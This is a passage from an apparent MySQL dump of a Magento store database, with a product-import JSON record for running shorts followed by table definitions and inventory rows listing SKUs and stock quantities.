Short-32-Red\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erika-running-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"1993\":{\"sku\":\"WSH12\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Erika Running Short\",\"description\":\"<p>A great short with a body-hugging design, the Erika Running Short is perfect for runners who prefer a fitted short rather than the traditional baggy variety.<\\/p>\\n<p>&bull; Seafoam pattern running shorts.<br \\/>&bull; Elastic waistband.<br \\/>&bull; Snug fit.<br \\/>&bull; 4\'\' inseam.<br \\/>&bull; 76% premium brushed Nylon \\/ 24% Spandex.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"45\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic|Snug,material=Organic Cotton|Polyester|Spandex,pattern=Graphic Print,climate=Hot|Mild|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH12-28-Green,size=28,color=Green|sku=WSH12-28-Purple,size=28,color=Purple|sku=WSH12-28-Red,size=28,color=Red|sku=WSH12-29-Green,size=29,color=Green|sku=WSH12-29-Purple,size=29,color=Purple|sku=WSH12-29-Red,size=29,color=Red|sku=WSH12-30-Green,size=30,color=Green|sku=WSH12-30-Purple,size=30,color=Purple|sku=WSH12-30-Red,size=30,color=Red|sku=WSH12-31-Green,size=31,color=Green|sku=WSH12-31-Purple,size=31,color=Purple|sku=WSH12-31-Red,size=31,color=Red|sku=WSH12-32-Green,size=32,color=Green|sku=WSH12-32-Purple,size=32,color=Purple|sku=WSH12-32-Red,size=32,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"image\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh12-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh12-green_alt1.jpg,\\/w\\/s\\/wsh12-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic|Snug\",\"material\":\"Organic Cotton|Polyester|Spandex\",\"pattern\":\"Graphic Print\",\"climate\":\"Hot|Mild|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"}}');

-- --------------------------------------------------------

--
-- Table structure for table `import_history`
--

CREATE TABLE `import_history` (
  `history_id` int(10) UNSIGNED NOT NULL COMMENT 'History record ID',
  `started_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Started at',
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'User ID',
  `imported_file` varchar(255) DEFAULT NULL COMMENT 'Imported file',
  `execution_time` varchar(255) DEFAULT NULL COMMENT 'Execution time',
  `summary` varchar(255) DEFAULT NULL COMMENT 'Summary',
  `error_file` varchar(255) NOT NULL COMMENT 'Imported file with errors'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Import history table';

--
-- Dumping data for table `import_history`
--

INSERT INTO `import_history` (`history_id`, `started_at`, `user_id`, `imported_file`, `execution_time`, `summary`, `error_file`) VALUES
(1, '2020-08-08 01:42:40', 0, NULL, '00:01:19', 'Created: 1994, Updated: 0, Deleted: 0', '');

-- --------------------------------------------------------

--
-- Table structure for table `indexer_state`
--

CREATE TABLE `indexer_state` (
  `state_id` int(10) UNSIGNED NOT NULL COMMENT 'Indexer State ID',
  `indexer_id` varchar(255) DEFAULT NULL COMMENT 'Indexer ID',
  `status` varchar(16) DEFAULT 'invalid' COMMENT 'Indexer Status',
  `updated` datetime DEFAULT NULL COMMENT 'Indexer Status',
  `hash_config` varchar(32) NOT NULL COMMENT 'Hash of indexer config'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Indexer State';

--
-- Dumping data for table `indexer_state`
--

INSERT INTO `indexer_state` (`state_id`, `indexer_id`, `status`, `updated`, `hash_config`) VALUES
(1, 'design_config_grid', 'valid', '2021-06-15 12:10:33', '885a291021fe4dfac0326b2cd7b0b7dc'),
(2, 'customer_grid', 'valid', '2021-06-15 12:10:36', 'd5a60c5b6866935ac8016254a38cb96c'),
(3, 'catalog_category_product', 'valid', '2021-06-15 12:10:38', '4b0705f6374b05621d7cf13e9f5494d7'),
(4, 'catalog_product_category', 'valid', '2021-06-15 12:10:40', 'd8f89072c7a7c21521e2f7cda81fd6f7'),
(5, 'catalogrule_rule', 'valid', '2021-06-15 12:10:45', '2dab86ed67742560a7094e99c6b872f5'),
(6, 'catalog_product_attribute', 'valid', '2021-06-15 12:10:48', 'ec1cd3d530ef2f553bfd8acc4ef33b45'),
(7, 'cataloginventory_stock', 'valid', '2021-06-15 12:10:50', '7ef8200879466a28ccade98ff8df9a00'),
(8, 'inventory', 'valid', '2021-06-15 12:10:50', 'af8e202617ac8900c39207c002e0a778'),
(9, 'catalogrule_product', 'valid', '2021-06-15 12:10:53', '4fd3837304b17762998a75ff48aaf813'),
(10, 'catalog_product_price', 'valid', '2021-06-15 12:10:55', '59187d5e97d6a2a6aa16bf9b78e88e32'),
(11, 'scconnector_google_remove', 'valid', '2021-06-15 12:10:55', 'ea24251ef7ef6d95ef975c5c5d91ddd9'),
(12, 'scconnector_google_feed', 'valid', '2021-06-15 12:10:55', '37c8857be820f1e7244712a5b51febac'),
(13, 'catalogsearch_fulltext', 'valid', '2021-06-15 12:11:00', '7521da539c64ebb7c7c5d39ab886de03');

-- --------------------------------------------------------

--
-- Table structure for table `integration`
--

CREATE TABLE `integration` (
  `integration_id` int(10) UNSIGNED NOT NULL COMMENT 'Integration ID',
  `name` varchar(255) NOT NULL COMMENT 'Integration name is displayed in the admin interface',
  `email` varchar(255) NOT NULL COMMENT 'Email address of the contact person',
  `endpoint` varchar(255) DEFAULT NULL COMMENT 'Endpoint for posting consumer credentials',
  `status` smallint(5) UNSIGNED NOT NULL COMMENT 'Integration status',
  `consumer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Oauth consumer',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Creation Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time',
  `setup_type` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Integration type - manual or config file',
  `identity_link_url` varchar(255) DEFAULT NULL COMMENT 'Identity linking Url'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='integration';

-- --------------------------------------------------------

--
-- Table structure for table `inventory_geoname`
--

CREATE TABLE `inventory_geoname` (
  `country_code` varchar(64) NOT NULL,
  `postcode` varchar(64) NOT NULL,
  `city` varchar(180) NOT NULL,
  `region` varchar(100) NOT NULL,
  `province` varchar(64) NOT NULL,
  `latitude` double NOT NULL,
  `longitude` double NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `inventory_low_stock_notification_configuration`
--

CREATE TABLE `inventory_low_stock_notification_configuration` (
  `source_code` varchar(255) NOT NULL,
  `sku` varchar(64) NOT NULL,
  `notify_stock_qty` decimal(12,4) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_low_stock_notification_configuration`
--

INSERT INTO `inventory_low_stock_notification_configuration` (`source_code`, `sku`, `notify_stock_qty`) VALUES
('default', 'CREAM', NULL),
('default', 'DD53', NULL),
('default', 'DD53g', NULL),
('default', 'EC-416', NULL),
('default', 'FF44', NULL),
('default', 'FF45', NULL),
('default', 'fff55r', NULL),
('default', 'GGGDF44', NULL),
('default', 'GH786', NULL),
('default', 'HGF64', NULL),
('default', 'New Spot', NULL),
('default', 'perfume1', NULL),
('default', 'PERFUME121', NULL),
('default', 'Ramy Mesta Guard Face', NULL),
('default', 'Ramy Spot Cleaner Cream', NULL),
('default', 'RAMY SPOT LESS FAIRNESS CREAM', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `inventory_reservation`
--

CREATE TABLE `inventory_reservation` (
  `reservation_id` int(10) UNSIGNED NOT NULL,
  `stock_id` int(10) UNSIGNED NOT NULL,
  `sku` varchar(64) NOT NULL,
  `quantity` decimal(10,4) NOT NULL DEFAULT 0.0000,
  `metadata` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_reservation`
--

INSERT INTO `inventory_reservation` (`reservation_id`, `stock_id`, `sku`, `quantity`, `metadata`) VALUES
(1, 1, 'WS03-XS-Red', 1.0000, '{\"event_type\":\"shipment_created\",\"object_type\":\"order\",\"object_id\":\"1\"}'),
(2, 1, 'WS08-XS-Blue', 1.0000, '{\"event_type\":\"shipment_created\",\"object_type\":\"order\",\"object_id\":\"2\"}'),
(3, 1, 'DD53g', -1.0000, '{\"event_type\":\"order_placed\",\"object_type\":\"order\",\"object_id\":\"3\"}');

-- --------------------------------------------------------

--
-- Table structure for table `inventory_shipment_source`
--

CREATE TABLE `inventory_shipment_source` (
  `shipment_id` int(10) UNSIGNED NOT NULL,
  `source_code` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_shipment_source`
--

INSERT INTO `inventory_shipment_source` (`shipment_id`, `source_code`) VALUES
(1, 'default'),
(2, 'default');

-- --------------------------------------------------------

--
-- Table structure for table `inventory_source`
--

CREATE TABLE `inventory_source` (
  `source_code` varchar(255) NOT NULL,
  `name` varchar(255) NOT NULL,
  `enabled` smallint(5) UNSIGNED NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `latitude` decimal(8,6) DEFAULT NULL,
  `longitude` decimal(9,6) DEFAULT NULL,
  `country_id` varchar(2) NOT NULL,
  `region_id` int(10) UNSIGNED DEFAULT NULL,
  `region` varchar(255) DEFAULT NULL,
  `city` varchar(255) DEFAULT NULL,
  `street` varchar(255) DEFAULT NULL,
  `postcode` varchar(255) NOT NULL,
  `contact_name` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `phone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `use_default_carrier_config` smallint(5) UNSIGNED NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_source`
--

INSERT INTO `inventory_source` (`source_code`, `name`, `enabled`, `description`, `latitude`, `longitude`, `country_id`, `region_id`, `region`, `city`, `street`, `postcode`, `contact_name`, `email`, `phone`, `fax`, `use_default_carrier_config`) VALUES
('default', 'Default Source', 1, 'Default Source', 0.000000, 0.000000, 'US', NULL, NULL, NULL, NULL, '00000', NULL, NULL, NULL, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `inventory_source_carrier_link`
--

CREATE TABLE `inventory_source_carrier_link` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `source_code` varchar(255) NOT NULL,
  `carrier_code` varchar(255) NOT NULL,
  `position` smallint(5) UNSIGNED DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `inventory_source_item`
--

CREATE TABLE `inventory_source_item` (
  `source_item_id` int(10) UNSIGNED NOT NULL,
  `source_code` varchar(255) NOT NULL,
  `sku` varchar(64) NOT NULL,
  `quantity` decimal(12,4) NOT NULL DEFAULT 0.0000,
  `status` smallint(5) UNSIGNED NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `inventory_source_item`
--

INSERT INTO `inventory_source_item` (`source_item_id`, `source_code`, `sku`, `quantity`, `status`) VALUES
(2, 'default', 'perfume1', 22.0000, 1),
(4, 'default', 'PERFUME121', 55.0000, 1),
(9, 'default', 'CREAM', 55.0000, 1),
(10, 'default', '24-MB01', 100.0000, 1),
(11, 'default', '24-MB04', 100.0000, 1),
(12, 'default', '24-MB03', 100.0000, 1),
(13, 'default', '24-MB05', 100.0000, 1),
(14, 'default', '24-MB06', 100.0000, 1),
(15, 'default', '24-MB02', 100.0000, 1),
(16, 'default', '24-UB02', 100.0000, 1),
(17, 'default', '24-WB01', 100.0000, 1),
(18, 'default', '24-WB02', 100.0000, 1),
(19, 'default', '24-WB05', 100.0000, 1),
(20, 'default', '24-WB06', 100.0000, 1),
(21, 'default', '24-WB03', 100.0000, 1),
(22, 'default', '24-WB07', 100.0000, 1),
(23, 'default', '24-WB04', 100.0000, 1),
(24, 'default', '24-UG06', 100.0000, 1),
(25, 'default', '24-UG07', 100.0000, 1),
(26, 'default', '24-UG04', 100.0000, 1),
(27, 'default', '24-UG02', 100.0000, 1),
(28, 'default', '24-UG05', 100.0000, 1),
(29, 'default', '24-UG01', 100.0000, 1),
(30, 'default', '24-WG084', 100.0000, 1),
(31, 'default', '24-WG088', 100.0000, 1),
(32, 'default', '24-UG03', 100.0000, 1),
(33, 'default', '24-WG081-gray', 100.0000, 1),
(34, 'default', '24-WG081-pink', 100.0000, 1),
(35, 'default', '24-WG081-blue', 100.0000, 1),
(36, 'default', '24-WG082-gray', 100.0000, 1),
(37, 'default', '24-WG082-pink', 100.0000, 1),
(38, 'default', '24-WG082-blue', 100.0000, 1),
(39, 'default', '24-WG083-gray', 100.0000, 1),
(40, 'default', '24-WG083-pink', 100.0000, 1),
(41, 'default', '24-WG083-blue', 100.0000, 1),
(42, 'default', '24-WG085', 100.0000, 1),
(43, 'default', '24-WG086', 100.0000, 1),
(44, 'default', '24-WG087', 100.0000, 1),
(45, 'default', '24-MG04', 100.0000, 1),
(46, 'default', '24-MG01', 100.0000, 1),
(47, 'default', '24-MG03', 100.0000, 1),
(48, 'default', '24-MG05', 100.0000, 1),
(49, 'default', '24-MG02', 100.0000, 1),
(50, 'default', '24-WG09', 100.0000, 1),
(51, 'default', '24-WG01', 100.0000, 1),
(52, 'default', '24-WG03', 100.0000, 1),
(53, 'default', '24-WG02', 100.0000, 1),
(60, 'default', '240-LV04', 0.0000, 1),
(61, 'default', '240-LV05', 0.0000, 1),
(62, 'default', '240-LV06', 0.0000, 1),
(63, 'default', '240-LV07', 0.0000, 1),
(64, 'default', '240-LV08', 0.0000, 1),
(65, 'default', '240-LV09', 0.0000, 1),
(66, 'default', 'MH01-XS-Black', 100.0000, 1),
(67, 'default', 'MH01-XS-Gray', 100.0000, 1),
(68, 'default', 'MH01-XS-Orange', 100.0000, 1),
(69, 'default', 'MH01-S-Black', 100.0000, 1),
(70, 'default', 'MH01-S-Gray', 100.0000, 1),
(71, 'default', 'MH01-S-Orange', 100.0000, 1),
(72, 'default', 'MH01-M-Black', 100.0000, 1),
(73, 'default', 'MH01-M-Gray', 100.0000, 1),
(74, 'default', 'MH01-M-Orange', 100.0000, 1),
(75, 'default', 'MH01-L-Black', 100.0000, 1),
(76, 'default', 'MH01-L-Gray', 100.0000, 1),
(77, 'default', 'MH01-L-Orange', 100.0000, 1),
(78, 'default', 'MH01-XL-Black', 100.0000, 1),
(79, 'default', 'MH01-XL-Gray', 100.0000, 1),
(80, 'default', 'MH01-XL-Orange', 100.0000, 1),
(81, 'default', 'MH01', 0.0000, 1),
(82, 'default', 'MH02-XS-Black', 100.0000, 1),
(83, 'default', 'MH02-XS-Purple', 100.0000, 1),
(84, 'default', 'MH02-XS-Red', 100.0000, 1),
(85, 'default', 'MH02-S-Black', 100.0000, 1),
(86, 'default', 'MH02-S-Purple', 100.0000, 1),
(87, 'default', 'MH02-S-Red', 100.0000, 1),
(88, 'default', 'MH02-M-Black', 100.0000, 1),
(89, 'default', 'MH02-M-Purple', 100.0000, 1),
(90, 'default', 'MH02-M-Red', 100.0000, 1),
(91, 'default', 'MH02-L-Black', 100.0000, 1),
(92, 'default', 'MH02-L-Purple', 100.0000, 1),
(93, 'default', 'MH02-L-Red', 100.0000, 1),
(94, 'default', 'MH02-XL-Black', 100.0000, 1),
(95, 'default', 'MH02-XL-Purple', 100.0000, 1),
(96, 'default', 'MH02-XL-Red', 100.0000, 1),
(97, 'default', 'MH02', 0.0000, 1),
(98, 'default', 'MH03-XS-Black', 100.0000, 1),
(99, 'default', 'MH03-XS-Blue', 100.0000, 1),
(100, 'default', 'MH03-XS-Green', 100.0000, 1),
(101, 'default', 'MH03-S-Black', 100.0000, 1),
(102, 'default', 'MH03-S-Blue', 100.0000, 1),
(103, 'default', 'MH03-S-Green', 100.0000, 1),
(104, 'default', 'MH03-M-Black', 100.0000, 1),
(105, 'default', 'MH03-M-Blue', 100.0000, 1),
(106, 'default', 'MH03-M-Green', 100.0000, 1),
(107, 'default', 'MH03-L-Black', 100.0000, 1),
(108, 'default', 'MH03-L-Blue', 100.0000, 1),
(109, 'default', 'MH03-L-Green', 100.0000, 1),
(110, 'default', 'MH03-XL-Black', 100.0000, 1),
(111, 'default', 'MH03-XL-Blue', 100.0000, 1),
(112, 'default', 'MH03-XL-Green', 100.0000, 1),
(113, 'default', 'MH03', 0.0000, 1),
(114, 'default', 'MH04-XS-Green', 100.0000, 1),
(115, 'default', 'MH04-XS-White', 100.0000, 1),
(116, 'default', 'MH04-XS-Yellow', 100.0000, 1),
(117, 'default', 'MH04-S-Green', 100.0000, 1),
(118, 'default', 'MH04-S-White', 100.0000, 1),
(119, 'default', 'MH04-S-Yellow', 100.0000, 1),
(120, 'default', 'MH04-M-Green', 100.0000, 1),
(121, 'default', 'MH04-M-White', 100.0000, 1),
(122, 'default', 'MH04-M-Yellow', 100.0000, 1),
(123, 'default', 'MH04-L-Green', 100.0000, 1),
(124, 'default', 'MH04-L-White', 100.0000, 1),
(125, 'default', 'MH04-L-Yellow', 100.0000, 1),
(126, 'default', 'MH04-XL-Green', 100.0000, 1),
(127, 'default', 'MH04-XL-White', 100.0000, 1),
(128, 'default', 'MH04-XL-Yellow', 100.0000, 1),
(129, 'default', 'MH04', 0.0000, 1),
(130, 'default', 'MH05-XS-Green', 100.0000, 1),
(131, 'default', 'MH05-XS-Red', 100.0000, 1),
(132, 'default', 'MH05-XS-White', 100.0000, 1),
(133, 'default', 'MH05-S-Green', 100.0000, 1),
(134, 'default', 'MH05-S-Red', 100.0000, 1),
(135, 'default', 'MH05-S-White', 100.0000, 1),
(136, 'default', 'MH05-M-Green', 100.0000, 1),
(137, 'default', 'MH05-M-Red', 100.0000, 1),
(138, 'default', 'MH05-M-White', 100.0000, 1),
(139, 'default', 'MH05-L-Green', 100.0000, 1),
(140, 'default', 'MH05-L-Red', 100.0000, 1),
(141, 'default', 'MH05-L-White', 100.0000, 1),
(142, 'default', 'MH05-XL-Green', 100.0000, 1),
(143, 'default', 'MH05-XL-Red', 100.0000, 1),
(144, 'default', 'MH05-XL-White', 100.0000, 1),
(145, 'default', 'MH05', 0.0000, 1),
(146, 'default', 'MH06-XS-Black', 100.0000, 1),
(147, 'default', 'MH06-XS-Blue', 100.0000, 1),
(148, 'default', 'MH06-XS-Purple', 100.0000, 1),
(149, 'default', 'MH06-S-Black', 100.0000, 1),
(150, 'default', 'MH06-S-Blue', 100.0000, 1),
(151, 'default', 'MH06-S-Purple', 100.0000, 1),
(152, 'default', 'MH06-M-Black', 100.0000, 1),
(153, 'default', 'MH06-M-Blue', 100.0000, 1),
(154, 'default', 'MH06-M-Purple', 100.0000, 1),
(155, 'default', 'MH06-L-Black', 100.0000, 1),
(156, 'default', 'MH06-L-Blue', 100.0000, 1),
(157, 'default', 'MH06-L-Purple', 100.0000, 1),
(158, 'default', 'MH06-XL-Black', 100.0000, 1),
(159, 'default', 'MH06-XL-Blue', 100.0000, 1),
(160, 'default', 'MH06-XL-Purple', 100.0000, 1),
(161, 'default', 'MH06', 0.0000, 1),
(162, 'default', 'MH07-XS-Black', 100.0000, 1),
(163, 'default', 'MH07-XS-Gray', 100.0000, 1),
(164, 'default', 'MH07-XS-Green', 100.0000, 1),
(165, 'default', 'MH07-S-Black', 100.0000, 1),
(166, 'default', 'MH07-S-Gray', 100.0000, 1),
(167, 'default', 'MH07-S-Green', 100.0000, 1),
(168, 'default', 'MH07-M-Black', 100.0000, 1),
(169, 'default', 'MH07-M-Gray', 100.0000, 1),
(170, 'default', 'MH07-M-Green', 100.0000, 1),
(171, 'default', 'MH07-L-Black', 100.0000, 1),
(172, 'default', 'MH07-L-Gray', 100.0000, 1),
(173, 'default', 'MH07-L-Green', 100.0000, 1),
(174, 'default', 'MH07-XL-Black', 100.0000, 1),
(175, 'default', 'MH07-XL-Gray', 100.0000, 1),
(176, 'default', 'MH07-XL-Green', 100.0000, 1),
(177, 'default', 'MH07', 0.0000, 1),
(178, 'default', 'MH08-XS-Brown', 100.0000, 1),
(179, 'default', 'MH08-XS-Purple', 100.0000, 1),
(180, 'default', 'MH08-XS-Red', 100.0000, 1),
(181, 'default', 'MH08-S-Brown', 100.0000, 1),
(182, 'default', 'MH08-S-Purple', 100.0000, 1),
(183, 'default', 'MH08-S-Red', 100.0000, 1),
(184, 'default', 'MH08-M-Brown', 100.0000, 1),
(185, 'default', 'MH08-M-Purple', 100.0000, 1),
(186, 'default', 'MH08-M-Red', 100.0000, 1),
(187, 'default', 'MH08-L-Brown', 100.0000, 1),
(188, 'default', 'MH08-L-Purple', 100.0000, 1),
(189, 'default', 'MH08-L-Red', 100.0000, 1),
(190, 'default', 'MH08-XL-Brown', 100.0000, 1),
(191, 'default', 'MH08-XL-Purple', 100.0000, 1),
(192, 'default', 'MH08-XL-Red', 100.0000, 1),
(193, 'default', 'MH08', 0.0000, 1),
(194, 'default', 'MH09-XS-Blue', 100.0000, 1),
(195, 'default', 'MH09-XS-Green', 100.0000, 1),
(196, 'default', 'MH09-XS-Red', 100.0000, 1),
(197, 'default', 'MH09-S-Blue', 100.0000, 1),
(198, 'default', 'MH09-S-Green', 100.0000, 1),
(199, 'default', 'MH09-S-Red', 100.0000, 1),
(200, 'default', 'MH09-M-Blue', 100.0000, 1),
(201, 'default', 'MH09-M-Green', 100.0000, 1),
(202, 'default', 'MH09-M-Red', 100.0000, 1),
(203, 'default', 'MH09-L-Blue', 100.0000, 1),
(204, 'default', 'MH09-L-Green', 100.0000, 1),
(205, 'default', 'MH09-L-Red', 100.0000, 1),
(206, 'default', 'MH09-XL-Blue', 100.0000, 1),
(207, 'default', 'MH09-XL-Green', 100.0000, 1),
(208, 'default', 'MH09-XL-Red', 100.0000, 1),
(209, 'default', 'MH09', 0.0000, 1),
(210, 'default', 'MH10-XS-Black', 100.0000, 1),
(211, 'default', 'MH10-XS-Blue', 100.0000, 1),
(212, 'default', 'MH10-XS-Red', 100.0000, 1),
(213, 'default', 'MH10-S-Black', 100.0000, 1),
(214, 'default', 'MH10-S-Blue', 100.0000, 1),
(215, 'default', 'MH10-S-Red', 100.0000, 1),
(216, 'default', 'MH10-M-Black', 100.0000, 1),
(217, 'default', 'MH10-M-Blue', 100.0000, 1),
(218, 'default', 'MH10-M-Red', 100.0000, 1),
(219, 'default', 'MH10-L-Black', 100.0000, 1),
(220, 'default', 'MH10-L-Blue', 100.0000, 1),
(221, 'default', 'MH10-L-Red', 100.0000, 1),
(222, 'default', 'MH10-XL-Black', 100.0000, 1),
(223, 'default', 'MH10-XL-Blue', 100.0000, 1),
(224, 'default', 'MH10-XL-Red', 100.0000, 1),
(225, 'default', 'MH10', 0.0000, 1),
(226, 'default', 'MH11-XS-Orange', 100.0000, 1),
(227, 'default', 'MH11-XS-Red', 100.0000, 1),
(228, 'default', 'MH11-XS-White', 100.0000, 1),
(229, 'default', 'MH11-S-Orange', 100.0000, 1),
(230, 'default', 'MH11-S-Red', 100.0000, 1),
(231, 'default', 'MH11-S-White', 100.0000, 1),
(232, 'default', 'MH11-M-Orange', 100.0000, 1),
(233, 'default', 'MH11-M-Red', 100.0000, 1),
(234, 'default', 'MH11-M-White', 100.0000, 1),
(235, 'default', 'MH11-L-Orange', 100.0000, 1),
(236, 'default', 'MH11-L-Red', 100.0000, 1),
(237, 'default', 'MH11-L-White', 100.0000, 1),
(238, 'default', 'MH11-XL-Orange', 100.0000, 1),
(239, 'default', 'MH11-XL-Red', 100.0000, 1),
(240, 'default', 'MH11-XL-White', 100.0000, 1),
(241, 'default', 'MH11', 0.0000, 1),
(242, 'default', 'MH12-XS-Blue', 100.0000, 1),
(243, 'default', 'MH12-XS-Green', 100.0000, 1),
(244, 'default', 'MH12-XS-Red', 100.0000, 1),
(245, 'default', 'MH12-S-Blue', 100.0000, 1),
(246, 'default', 'MH12-S-Green', 100.0000, 1),
(247, 'default', 'MH12-S-Red', 100.0000, 1),
(248, 'default', 'MH12-M-Blue', 100.0000, 1),
